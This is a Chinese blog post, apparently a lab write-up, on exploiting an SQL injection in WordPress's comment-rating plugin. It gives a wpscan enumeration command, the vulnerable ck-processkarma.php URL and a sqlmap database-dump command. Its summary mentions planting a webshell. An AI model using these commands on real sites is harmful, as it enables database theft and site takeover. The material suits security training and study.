墨者学院 - WordPress插件漏洞分析溯源

本文详细记录了对WordPress网站进行安全检测的过程,首先利用wpscan扫描插件漏洞,然后针对找到的问题插件`comment-rating`,通过sqlmap进行数据库交互,枚举数据库、表格和字段,成功获取账号密码并进行MD5解密。接着,登录WordPress后台,编辑插件添加一句话木马,并利用菜刀进行进一步的控制。
摘要由CSDN通过智能技术生成

使用wpscan扫面wordpress有漏洞的插件

wpscan --url  "ip" --enumerate vp

 


查找插件漏洞
http://www.bkjia.com/xtaq/783717.html


构造链接

http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a

 

sqlmap -u "http://ip/wp-content/plugins/comment-rating/ck-processkarma.php?id=1&action=add&path=a" --dbs
查数据库

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值